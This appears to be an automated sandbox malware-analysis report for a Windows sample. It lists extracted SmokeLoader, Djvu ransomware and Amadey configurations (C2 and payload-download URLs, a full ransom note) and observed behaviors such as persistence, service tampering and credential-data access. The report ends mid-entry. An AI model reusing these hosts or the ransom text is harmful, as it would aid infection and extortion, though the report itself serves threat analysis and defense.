Analysis
-
max time kernel
151s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20230221-en -
resource tags
arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system -
submitted
18/04/2023, 12:03
Static task
static1
Behavioral task
behavioral1
Sample
baaf51dad1b196c5e4852c748a6eebf39737ea8af93f452c22168f46b76d7db3.exe
Resource
win10v2004-20230221-en
General
-
Target
baaf51dad1b196c5e4852c748a6eebf39737ea8af93f452c22168f46b76d7db3.exe
-
Size
352KB
-
MD5
bbe0d19d03c7cb7d5f618f5a9f5dda34
-
SHA1
fa7b42170f5502480cecbd59c4ba61f9df5a71b5
-
SHA256
baaf51dad1b196c5e4852c748a6eebf39737ea8af93f452c22168f46b76d7db3
-
SHA512
2cf0f6d5d769219a8fa4bb8c8a300ef7b08d024b9e5a15d38dc9d0f112f6aaa0dc371a87c03bfec6bcb213cd43db6bd3bada22774459a91f88dfb74d7b38b6b2
-
SSDEEP
6144:1Dwh0NukFc0VptnvWhZamyctWruhMZmn2uT:1DYSbc0VpJvuYc8rfqp
Malware Config
Extracted
smokeloader
2022
http://potunulit.org/
http://hutnilior.net/
http://bulimu55t.net/
http://soryytlic4.net/
http://novanosa5org.org/
http://nuljjjnuli.org/
http://tolilolihul.net/
http://somatoka51hub.net/
http://hujukui3.net/
http://bukubuka1.net/
http://golilopaster.org/
http://newzelannd66.org/
http://otriluyttn.org/
http://hoh0aeghwugh2gie.com/
http://hie7doodohpae4na.com/
http://aek0aicifaloh1yo.com/
http://yic0oosaeiy7ahng.com/
http://wa5zu7sekai8xeih.com/
Extracted
smokeloader
sprg
Extracted
djvu
http://zexeq.com/lancer/get.php
-
extension
.coty
-
offline_id
O8Ao46dcCReRPC4I1PGMYsRFFc9WI5eOp0O3MFt1
-
payload_url
http://uaery.top/dl/build2.exe
http://zexeq.com/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-bs3qPf67hU Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0692JOsie
Extracted
amadey
3.70
77.73.134.27/n9kdjc3xSf/index.php
Signatures
-
Detected Djvu ransomware 16 IoCs
resource yara_rule behavioral1/memory/532-191-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/3416-197-0x0000000002600000-0x000000000271B000-memory.dmp family_djvu behavioral1/memory/532-210-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/532-200-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/532-194-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/532-264-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/5004-274-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/5004-275-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/5004-283-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/5004-281-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/5004-284-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/5004-303-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/5004-305-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/5004-306-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/5004-315-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/5004-331-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Modifies security service 2 TTPs 5 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs
description pid Process procid_target PID 1052 created 3128 1052 XandETC.exe 55 PID 1052 created 3128 1052 XandETC.exe 55 PID 1052 created 3128 1052 XandETC.exe 55 PID 1052 created 3128 1052 XandETC.exe 55 PID 1052 created 3128 1052 XandETC.exe 55 PID 4856 created 3128 4856 updater.exe 55 PID 4856 created 3128 4856 updater.exe 55 PID 4856 created 3128 4856 updater.exe 55 PID 4856 created 3128 4856 updater.exe 55 PID 4420 created 3128 4420 conhost.exe 55 PID 4856 created 3128 4856 updater.exe 55 PID 4856 created 3128 4856 updater.exe 55 -
Blocklisted process makes network request 5 IoCs
flow pid Process 64 1436 powershell.exe 131 3724 msiexec.exe 146 1804 powershell.exe 148 2532 powershell.exe 157 4996 powershell.exe -
Downloads MZ/PE file
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation cscript.exe Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation D3B3.exe Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation D1AE.exe Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation oldplayer.exe Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation oneetx.exe Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation D3B3.exe -
Executes dropped EXE 21 IoCs
pid Process 1908 C18F.exe 2560 C2E8.exe 3640 D1AE.exe 3416 D3B3.exe 1824 D4FC.exe 532 D3B3.exe 3576 ss31.exe 1232 oldplayer.exe 1052 XandETC.exe 4908 oneetx.exe 4400 E411.exe 792 D3B3.exe 5004 D3B3.exe 856 build3.exe 4404 mstsca.exe 1996 oneetx.exe 4856 updater.exe 2528 oneetx.exe 4496 wazuh-agent.exe 4876 restart-wazuh.exe 4036 wazuh-agent.exe -
Loads dropped DLL 22 IoCs
pid Process 1176 MsiExec.exe 1176 MsiExec.exe 1176 MsiExec.exe 3096 MsiExec.exe 3096 MsiExec.exe 4496 wazuh-agent.exe 4496 wazuh-agent.exe 4496 wazuh-agent.exe 4496 wazuh-agent.exe 4496 wazuh-agent.exe 4496 wazuh-agent.exe 4496 wazuh-agent.exe 4876 restart-wazuh.exe 4876 restart-wazuh.exe 4876 restart-wazuh.exe 4036 wazuh-agent.exe 4036 wazuh-agent.exe 4036 wazuh-agent.exe 4036 wazuh-agent.exe 4036 wazuh-agent.exe 4036 wazuh-agent.exe 4036 wazuh-agent.exe -
Modifies file permissions 1 TTPs 4 IoCs
pid Process 1668 icacls.exe 3708 icacls.exe 2680 icacls.exe 1428 icacls.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\06e553a9-a79f-4d19-9a37-d16572b320e1\\D3B3.exe\" --AutoStart" D3B3.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 54 api.2ip.ua 39 api.2ip.ua 40 api.2ip.ua -
Drops file in System32 directory 3 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 3416 set thread context of 532 3416 D3B3.exe 94 PID 792 set thread context of 5004 792 D3B3.exe 117 PID 4856 set thread context of 4420 4856 updater.exe 214 PID 4856 set thread context of 1688 4856 updater.exe 220 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\ossec-agent\local_internal_options.conf powershell.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File opened for modification C:\Program Files (x86)\ossec-agent\rids\sender_counter wazuh-agent.exe File opened for modification C:\Program Files (x86)\ossec-agent\queue\logcollector\file_status.json wazuh-agent.exe File created C:\Program Files (x86)\ossec-agent\ossec.conf msiexec.exe File created C:\Program Files (x86)\ossec-agent\wpk_root.pem msiexec.exe File created C:\Program Files (x86)\ossec-agent\shared\win_applications_rcl.txt msiexec.exe File created C:\Program Files (x86)\ossec-agent\wazuh-agent.state wazuh-agent.exe File created C:\Program Files (x86)\ossec-agent\rids\sender_counter wazuh-agent.exe File created C:\Program Files (x86)\ossec-agent\.agent_info wazuh-agent.exe File opened for modification C:\Program Files (x86)\ossec-agent\rids\sender_counter wazuh-agent.exe File opened for modification C:\Program Files (x86)\ossec-agent\queue\fim\db\fim.db wazuh-agent.exe File created C:\Program Files (x86)\ossec-agent\internal_options.conf msiexec.exe File created C:\Program Files (x86)\ossec-agent\syscollector.dll msiexec.exe File opened for modification C:\Program Files (x86)\ossec-agent\active-response\active-responses.log restart-wazuh.exe File created C:\Program Files (x86)\ossec-agent\dbsync.dll msiexec.exe File created C:\Program Files (x86)\ossec-agent\libwinpthread-1.dll msiexec.exe File created C:\Program Files (x86)\ossec-agent\LICENSE.txt msiexec.exe File created C:\Program Files (x86)\ossec-agent\libgcc_s_sjlj-1.dll msiexec.exe File created C:\Program Files (x86)\ossec-agent\libwazuhshared.dll msiexec.exe File created C:\Program Files (x86)\ossec-agent\active-response\bin\route-null.exe msiexec.exe File created C:\Program Files (x86)\ossec-agent\shared\win_audit_rcl.txt msiexec.exe File created C:\Program Files (x86)\ossec-agent\rids\194 wazuh-agent.exe File created C:\Program Files (x86)\ossec-agent\shared\ar.conf wazuh-agent.exe File created C:\Program Files (x86)\ossec-agent\libwazuhext.dll msiexec.exe File created C:\Program Files (x86)\ossec-agent\manage_agents.exe msiexec.exe File opened for modification C:\Program Files (x86)\ossec-agent\rids\194 wazuh-agent.exe File created C:\Program Files\Notepad\Chrome\updater.exe XandETC.exe File opened for modification C:\Program Files (x86)\ossec-agent\wazuh-agent.state wazuh-agent.exe File created C:\Program Files (x86)\ossec-agent\.wait wazuh-agent.exe File opened for modification C:\Program Files (x86)\ossec-agent\ossec.log wazuh-agent.exe File opened for modification C:\Program Files (x86)\ossec-agent\ossec.log wazuh-agent.exe File opened for modification C:\Program Files (x86)\ossec-agent\client.keys wazuh-agent.exe File created C:\Program Files (x86)\ossec-agent\shared\merged.mg wazuh-agent.exe File created C:\Program Files (x86)\ossec-agent\win32ui.exe.manifest msiexec.exe File opened for modification C:\Program Files (x86)\ossec-agent\queue\fim\db\fim.db wazuh-agent.exe File created C:\Program Files (x86)\ossec-agent\win32ui.exe msiexec.exe File created C:\Program Files (x86)\ossec-agent\client.keys MsiExec.exe File created C:\Program Files (x86)\ossec-agent\.wait wazuh-agent.exe File opened for modification C:\Program Files (x86)\ossec-agent\queue\fim\db\fim.db-journal wazuh-agent.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files (x86)\ossec-agent\queue\logcollector\file_status.json wazuh-agent.exe File created C:\Program Files (x86)\ossec-agent\agent-auth.exe.manifest msiexec.exe File created C:\Program Files (x86)\ossec-agent\profile.template msiexec.exe File created C:\Program Files (x86)\ossec-agent\shared\win_malware_rcl.txt msiexec.exe File created C:\Program Files (x86)\ossec-agent\active-response\bin\restart-wazuh.exe msiexec.exe File created C:\Program Files (x86)\ossec-agent\VERSION msiexec.exe File created C:\Program Files (x86)\ossec-agent\ruleset\sca\cis_win10_enterprise.yml msiexec.exe File created C:\Program Files (x86)\ossec-agent\help.txt msiexec.exe File created C:\Program Files (x86)\ossec-agent\rsync.dll msiexec.exe File opened for modification C:\Program Files (x86)\ossec-agent\wazuh-agent.state wazuh-agent.exe File opened for modification C:\Program Files (x86)\ossec-agent\queue\fim\db\fim.db-journal wazuh-agent.exe File created C:\Program Files (x86)\ossec-agent\queue\syscollector\norm_config.json msiexec.exe File created C:\Program Files (x86)\ossec-agent\sysinfo.dll msiexec.exe File created C:\Program Files (x86)\ossec-agent\shared\rootkit_trojans.txt msiexec.exe File created C:\Program Files (x86)\ossec-agent\wazuh-agent.exe msiexec.exe File opened for modification C:\Program Files (x86)\ossec-agent\ossec.conf MsiExec.exe File opened for modification C:\Program Files (x86)\ossec-agent\rids\194 wazuh-agent.exe File opened for modification C:\Program Files (x86)\ossec-agent\queue\logcollector\file_status.json wazuh-agent.exe File created C:\Program Files (x86)\ossec-agent\active-response\bin\netsh.exe msiexec.exe File created C:\Program Files (x86)\ossec-agent\shared\rootkit_files.txt msiexec.exe File created C:\Program Files (x86)\ossec-agent\agent-auth.exe msiexec.exe File opened for modification C:\Program Files (x86)\ossec-agent\.agent_info wazuh-agent.exe File created C:\Program Files (x86)\ossec-agent\REVISION msiexec.exe -
Drops file in Windows directory 15 IoCs
description ioc Process File created C:\Windows\Installer\e57c7c4.msi msiexec.exe File opened for modification C:\Windows\Installer\MSID6E9.tmp msiexec.exe File opened for modification C:\Windows\Installer\{5941DCC2-23D2-49D7-9EE9-3A55098EB19D}\icon.ico msiexec.exe File opened for modification C:\Windows\Installer\MSIDB31.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\SourceHash{5941DCC2-23D2-49D7-9EE9-3A55098EB19D} msiexec.exe File opened for modification C:\Windows\Installer\e57c7c4.msi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\{5941DCC2-23D2-49D7-9EE9-3A55098EB19D}\icon.ico msiexec.exe File opened for modification C:\Windows\Installer\MSIDC7A.tmp msiexec.exe File created C:\Windows\Installer\e57c7c7.msi msiexec.exe File opened for modification C:\Windows\Installer\MSID66A.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID69A.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID7B6.tmp msiexec.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3816 sc.exe 4892 sc.exe 3500 sc.exe 1836 sc.exe 1268 sc.exe 1680 sc.exe 4972 sc.exe 1608 sc.exe 1472 sc.exe 4940 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 3 IoCs
pid pid_target Process procid_target 3664 1824 WerFault.exe 93 1732 4400 WerFault.exe 102 3148 1908 WerFault.exe 86 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C2E8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI baaf51dad1b196c5e4852c748a6eebf39737ea8af93f452c22168f46b76d7db3.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI baaf51dad1b196c5e4852c748a6eebf39737ea8af93f452c22168f46b76d7db3.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI baaf51dad1b196c5e4852c748a6eebf39737ea8af93f452c22168f46b76d7db3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C2E8.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C2E8.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wazuh-agent.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wazuh-agent.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz wazuh-agent.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wazuh-agent.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wazuh-agent.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz wazuh-agent.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3164 schtasks.exe 4600 schtasks.exe 2536 schtasks.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1f\52C64B7E\@%SystemRoot%\System32\wuaueng.dll,-400 = "Windows Update" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script\Settings MsiExec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" MsiExec.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1f\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1f\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843 = "BitLocker Drive Encryption" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1f\52C64B7E\@%SystemRoot%\System32\ci.dll,-100 = "Isolated User Mode (IUM)" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1f\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844 = "BitLocker Data Recovery Agent" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1f msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1f\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe -
Modifies registry class 27 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CCD14952D327D94E99EA35590E81BD9\InstanceType = "0" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CCD14952D327D94E99EA35590E81BD9\AuthorizedLUAApp = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CCD14952D327D94E99EA35590E81BD9\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CCD14952D327D94E99EA35590E81BD9\Clients = 3a0000000000 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CCD14952D327D94E99EA35590E81BD9\AdvertiseFlags = "388" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings cscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CCD14952D327D94E99EA35590E81BD9\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CCD14952D327D94E99EA35590E81BD9\ProductName = "Wazuh Agent" msiexec.exe Set value (str) 